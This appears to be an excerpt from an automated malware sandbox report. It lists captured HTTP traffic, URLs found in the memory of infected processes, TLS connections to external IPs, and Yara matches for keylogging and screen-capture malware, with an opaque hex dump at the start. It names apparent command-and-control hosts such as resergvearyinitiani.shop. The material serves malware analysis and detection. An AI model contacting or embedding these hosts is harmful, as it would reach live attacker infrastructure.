d2 f4 44 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 57 90 26 48 c4 3a 96 31 cb e7 17 3f cc 98 7c 4d a4 70 d4 03 93 ae 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 dc a6 a7 5f 29 43 43 51 5c 03 62 18 1a 60 fa 40 a0 ae 88 c1 be a3 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e 6c 36 d5 1e cb 67 f5 e8 19 1f 88 b9 8c f5 28 ea 50 b9 c3 ea 9e 13 6c ba 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 79 42 68 0b 2d 03 81 96 7f dc 2e 27 9d 9f 41 40 56 64 de 9e 73 89 b4 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 be b1 8e 58 43 6a 2d 40 b3 e9 f3 32 72 de 39 16 12 17 76 eb 17 0e 8d e3 51 aa b0 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 51 8f 69 b9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-Powered-By: Express | Content-Security-Policy: default-src 'none' | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 147 | Date: Thu, 08 Feb 2024 18:08:44 GMT | Connection: keep-alive | Keep-Alive: timeout=5 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:26 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:27 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:28 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:29 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:31 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:32 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:34 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:37 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:44 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:49 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:09:55 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:10:04 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:10:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7=[0
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: explorer.exe, 00000002.00000000.1533658763.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1529283416.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1532600884.0000000007670000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: A6A0.exe, 00000011.00000003.1841420453.0000000002340000.00000004.00001000.00020000.00000000.sdmp, A6A0.exe, 00000014.00000003.1855819132.00000000021C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.innosetup.com/
                  Source: A6A0.exe, 00000011.00000003.1841420453.0000000002340000.00000004.00001000.00020000.00000000.sdmp, A6A0.exe, 00000014.00000003.1855819132.00000000021C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.remobjects.com/ps
                  Source: A6A0.exe, 00000011.00000003.1841420453.0000000002340000.00000004.00001000.00020000.00000000.sdmp, A6A0.exe, 00000014.00000003.1855819132.00000000021C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.remobjects.com/psU
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSJM
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSZM
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSp
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/rT
                  Source: explorer.exe, 00000002.00000000.1534171256.000000000862F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/~T
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1529480466.0000000002F10000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: 8E91.exe, 00000009.00000002.1991101064.00000000010F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
                  Source: 8837.exe, 00000008.00000003.2710971456.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2697097279.0000000003454000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2702403229.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000002.00000000.1534171256.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                  Source: explorer.exe, 00000002.00000000.1539002335.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.152.52:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.213.233.138:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.168:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.120:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.9:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.20.213.70:443 -> 192.168.2.9:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 86.59.21.38:443 -> 192.168.2.9:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.227.75.176:443 -> 192.168.2.9:49817 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 39.3.DC49.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.DC49.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.DC49.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
